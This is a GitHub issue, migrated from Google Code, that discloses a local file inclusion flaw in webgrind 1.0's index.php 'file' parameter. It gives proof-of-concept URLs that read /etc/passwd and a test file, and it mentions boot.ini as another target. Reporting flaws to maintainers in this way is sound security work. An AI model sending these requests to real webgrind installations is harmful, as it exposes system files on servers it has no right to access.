Skip to content

webgrind 1.0 (trunk 1.02) Local FIle Inclusion (LFI) Vulnerability #66

New issue
New issue
Open
Open
webgrind 1.0 (trunk 1.02) Local FIle Inclusion (LFI) Vulnerability#66
Labels
Priority-MediumType-Defectauto-migrated
@GoogleCodeExporter

Description

@GoogleCodeExporter
GoogleCodeExporter
opened on Jan 28, 2016
index.php, param: file

The lfitest.txt is located in C:\ (c:\lfitext.txt), you can replace it with 
boot.ini for example.

- http://localhost/webgrind/index.php?file=/lfitest.txt&op=fileviewer
- http://localhost/webgrind/index.php?file=/etc/passwd&op=fileviewer

2. Tested on current version of WampServer version 2.2c (win32) and fedora 
linux.
3. Webgrind version 1.0 (trunk v1.02 (github))

Thank You,

Gjoko,
lab@zeroscience.mk

Original issue reported on code.google.com by liquidw...@gmail.com on 22 Feb 2012 at 3:22

Metadata

Metadata

Assignees

No one assigned

    Labels

    Priority-MediumType-Defectauto-migrated

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions